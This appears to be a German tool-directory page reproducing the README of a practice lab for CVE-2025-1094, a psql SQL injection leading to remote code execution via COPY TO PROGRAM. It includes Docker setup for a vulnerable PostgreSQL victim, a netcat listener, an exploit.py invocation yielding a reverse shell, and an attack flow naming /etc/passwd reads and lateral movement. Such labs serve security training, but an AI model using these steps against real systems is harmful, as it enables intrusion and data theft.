Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-1094-Lab-Setup — # Praktisches Labor zur Ausnutzung von CVE-2025-1094, einer SQL-Injection in PostgreSQL psql, die über COPY TO PROGRAM zu RCE führt, mit Docker-Setup und Reverse-Shell-Payload. | Kitploit
Tools/GitHubGitHub/pinkarmor/cve-2025-1094-lab-setup
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubpinkarmor/cve-2025-1094-lab-setup

CVE-2025-1094-Lab-Setup

# Praktisches Labor zur Ausnutzung von CVE-2025-1094, einer SQL-Injection in PostgreSQL psql, die über COPY TO PROGRAM zu RCE führt, mit Docker-Setup und Reverse-Shell-Payload.

Repository anzeigen
9vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🛠️ CVE-2025-1094 Laborumgebung

⚠️ Haftungsausschluss
Dieses Labor dient ausschließlich Bildungs- und Forschungszwecken.
Verwenden Sie NICHT Informationen oder Techniken aus dieser Anleitung auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung zum Testen haben. Die unbefugte Nutzung dieser Methoden kann gegen Gesetze verstoßen und zu schwerwiegenden Strafen führen.


📌 Überblick

CVE-2025-1094 ist eine kritische Schwachstelle, die das interaktive Tool psql von PostgreSQL betrifft und in Version 14.15 und früheren Versionen entdeckt wurde.
Sie ermöglicht Angreifern die Durchführung von SQL-Injection, die unter bestimmten Bedingungen zu Remote Code Execution (RCE) führen kann.


🧨 Grundursache

Die Schwachstelle entsteht durch unsachgemäße Verarbeitung fehlerhafter UTF-8-Eingaben in psql.
Aufgrund unzureichender Validierung können Angreifer beliebiges SQL oder Meta-Befehle wie ! (Shell-Escape) injizieren und sogar COPY ... TO PROGRAM ausnutzen, um Systembefehle auszuführen.


🔥 Auswirkungen und Angriffsszenarien

  • SQL-Injection → RCE: Fehlerhafte UTF-8-Zeichenfolgen umgehen die Validierung und führen zur Ausführung beliebiger Abfragen.
  • Missbrauch von COPY TO PROGRAM: Angreifer können beliebige Shell-Befehle ausführen, wie z. B.:
    • Reverse Shells
    • Lesen sensibler Dateien (/etc/passwd)
    • Kombination mit anderen CVEs für vollständige RCE ohne Authentifizierung
  • Integrationsrisiko: Software, die psql mit nicht vertrauenswürdigen Eingaben verwendet (z. B. BeyondTrust PRA, Remote Support), ist besonders gefährdet.

🧪 Laboranforderungen

🐳 Opfer (Ubuntu)

Docker installieren:

sudo apt update
sudo apt install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt update
sudo apt install -y docker-ce docker-ce-cli containerd.io
sudo systemctl enable --now docker
sudo usermod -aG docker $USER

👉 Neustart oder Abmelden & erneut anmelden, um die Docker-Gruppenberechtigungen zu übernehmen.


🐍 Angreifer (Kali)

Python und Abhängigkeiten installieren:

sudo apt install -y python3 python3-pip python3-psycopg2 netcat-traditional

✅ Stellen Sie sicher, dass Netzwerkverbindung zwischen Angreifer- und Opfermaschine besteht.


⚙️ Schritt 1 – Verwundbaren PostgreSQL-Container bereitstellen (Opfer)

  1. PostgreSQL 14.15-Image pullen:
docker pull postgres:14.15
  1. Container ausführen:
docker run --name vulnerable_postgres   -e POSTGRES_USER=postgres123   -e POSTGRES_PASSWORD=StrongP@ssWord   -e POSTGRES_DB=labdb   -p 5432:5432   -d postgres:14.15
  1. ~5s für die Initialisierung warten, dann eine Demo-Tabelle erstellen:
docker exec -i vulnerable_postgres psql -U postgres123 -d labdb <<EOF
CREATE TABLE users (
  id SERIAL PRIMARY KEY,
  username TEXT,
  password TEXT
);
INSERT INTO users (username, password) VALUES ('admin', 'password123');
EOF

✅ Schritt 1.5 – Container- und Datenbank-Setup überprüfen

Nach dem Start des Containers überprüfen Sie mit den folgenden Befehlen, ob alles funktioniert:

1. Prüfen, ob der PostgreSQL-Container läuft:

sudo docker ps

📌 Sie sollten einen Container namens vulnerable_postgres sehen, der auf Port 5432 lauscht.


2. Auf den Container zugreifen und die Datenbank inspizieren:

sudo docker exec -it vulnerable_postgres psql -U postgres123 -d labdb

Führen Sie in der psql-Shell Folgendes aus:

SELECT * FROM users;

Erwartete Ausgabe:

 id | username |  password
----+----------+-------------
  1 | admin    | password123
(1 row)

psql beenden:

\q

✅ Ihre verwundbare PostgreSQL-Instanz läuft jetzt und ist bereit für die Ausnutzung.


3. Container wieder starten

sudo docker start vulnerable_postgres

📡 Schritt 2 – Ausnutzung vom Angreifer-Rechner

  1. Listener auf dem Angreifer-Rechner starten, um die Reverse Shell zu empfangen:
nc -lvnp 4444
  1. Exploit-Skript ausführen (IP und Port bei Bedarf anpassen):
python3 exploit.py <Victim_IP> <Attacker_IP> <Attacker_PORT>
  1. Bei Erfolg erhalten Sie eine Reverse Shell vom verwundbaren PostgreSQL-Container 🎉
[*] Connecting to PostgreSQL server...
[+] Connected successfully!
[*] Sending payload...
[✓] Payload executed! Check your Netcat listener for a shell.

🧰 Beispielhafter Exploit-Ablauf

  1. Fehlerhaftes UTF-8 injizieren, um die Eingabevalidierung zu umgehen
  2. COPY ... TO PROGRAM ausnutzen, um beliebige Shell-Befehle auszuführen
  3. Reverse Shell verbindet sich zurück zum Angreifer-Rechner
  4. Rechte erweitern oder laterale Bewegung innerhalb der Umgebung

💡 Tipp: Sie können diesen verwundbaren Container als Snapshot speichern und später wiederverwenden, ohne die Umgebung neu aufbauen zu müssen.

Tool herunterladen